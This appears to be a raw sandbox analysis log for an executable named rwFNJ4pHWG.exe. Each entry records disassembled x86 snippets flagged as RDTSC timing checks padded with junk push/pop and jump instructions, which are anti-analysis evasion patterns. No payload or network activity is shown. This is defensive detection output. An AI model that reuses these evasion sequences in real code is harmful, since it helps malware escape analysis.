Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EE274 second address: 3EE27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EE27C second address: 3EE280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EE280 second address: 3EE284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F1835 second address: 3F1856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAD0CDA8601h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jc 00007FAD0CDA85F6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F1856 second address: 3F1875 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D67h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F1875 second address: 3F1879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F0F0C second address: 3F0F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F0F15 second address: 3F0F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F0F19 second address: 3F0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F0F1D second address: 3F0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FAD0CDA85FCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F123E second address: 3F1256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FAD0D216D5Ch 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F1256 second address: 3F125C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F9A7A second address: 3F9A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F9A82 second address: 3F9A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7944 second address: 3F7963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FAD0D216D5Ch 0x0000000b jbe 00007FAD0D216D62h 0x00000011 jl 00007FAD0D216D56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7A79 second address: 3F7AAD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FAD0CDA8604h 0x00000008 jmp 00007FAD0CDA8605h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7AAD second address: 3F7AC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAD0D216D60h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7AC9 second address: 3F7ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7ACF second address: 3F7ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7C3A second address: 3F7C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7EB7 second address: 3F7EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F7EBB second address: 3F7EC5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8279 second address: 3F827D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F827D second address: 3F829D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAD0CDA85F6h 0x00000008 jnp 00007FAD0CDA85F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FAD0CDA85FDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8639 second address: 3F8672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Ah 0x00000007 jng 00007FAD0D216D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FAD0D216D5Ch 0x00000015 js 00007FAD0D216D56h 0x0000001b jmp 00007FAD0D216D5Fh 0x00000020 popad 0x00000021 jl 00007FAD0D216D7Ch 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8EF7 second address: 3F8EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8EFB second address: 3F8F01 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8F01 second address: 3F8F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8F07 second address: 3F8F11 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD0D216D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8F11 second address: 3F8F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F8F1E second address: 3F8F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3F9512 second address: 3F9516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FE6D8 second address: 3FE6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007FAD0D216D56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FE6E4 second address: 3FE6F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FD90E second address: 3FD914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FD914 second address: 3FD918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FD918 second address: 3FD927 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD0D216D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FD927 second address: 3FD94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0CDA8600h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FAD0CDA85F6h 0x00000012 jmp 00007FAD0CDA85FBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FDC49 second address: 3FDC6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FDC6C second address: 3FDC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FDC72 second address: 3FDC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FDF5E second address: 3FDF69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FE292 second address: 3FE296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FFD30 second address: 3FFD3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007FAD0CDA85F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3FFD3B second address: 3FFD5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FAD0D216D5Eh 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007FAD0D216D56h 0x00000017 jne 00007FAD0D216D58h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CEAC second address: 40CEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CEB0 second address: 40CEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CEB6 second address: 40CED0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8604h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CED0 second address: 40CED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CED4 second address: 40CF14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8609h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007FAD0CDA85F6h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FAD0CDA85FFh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CF14 second address: 40CF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40CF1A second address: 40CF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B109 second address: 40B110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B110 second address: 40B131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAD0CDA8601h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B131 second address: 40B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FAD0D216D56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B142 second address: 40B161 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD0CDA8609h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B690 second address: 40B696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B9B2 second address: 40B9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FAD0CDA85FEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40B9C1 second address: 40B9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40BDDE second address: 40BE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAD0CDA860Bh 0x0000000e jmp 00007FAD0CDA8605h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40BE01 second address: 40BE06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40BE06 second address: 40BE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 40F63E second address: 40F644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 359288 second address: 35928C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 35928C second address: 359290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 41493E second address: 414942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 414942 second address: 414947 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 41F980 second address: 41F986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 42418B second address: 42418F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 42418F second address: 4241C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FAD0CDA85FAh 0x00000013 jmp 00007FAD0CDA85FCh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4241C1 second address: 4241C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4274C4 second address: 4274ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007FAD0CDA85F6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f jl 00007FAD0CDA85FAh 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 jns 00007FAD0CDA85F6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4290F1 second address: 4290FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 434997 second address: 43499B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 43499B second address: 4349AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAD0D216D5Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4347FB second address: 434801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 434801 second address: 434805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 434805 second address: 434809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 434809 second address: 43481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FAD0D216D56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 43481B second address: 43481F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 439B87 second address: 439B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 43FD60 second address: 43FD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD0CDA85F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 440071 second address: 440078 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4401D1 second address: 4401D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4401D7 second address: 4401E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD0D216D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4401E1 second address: 4401E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 440503 second address: 440507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 455B43 second address: 455B58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD0CDA85FDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4573D5 second address: 457422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD0D216D69h 0x00000008 jmp 00007FAD0D216D67h 0x0000000d jmp 00007FAD0D216D68h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4647EF second address: 46480C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FAD0CDA8608h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 46480C second address: 464818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007FAD0D216D56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 464818 second address: 464852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FAD0CDA861Eh 0x00000011 pushad 0x00000012 jmp 00007FAD0CDA8604h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 464852 second address: 46485E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAD0D216D56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 4649A5 second address: 4649CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FAD0CDA85FAh 0x0000000a push ecx 0x0000000b jmp 00007FAD0CDA8604h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
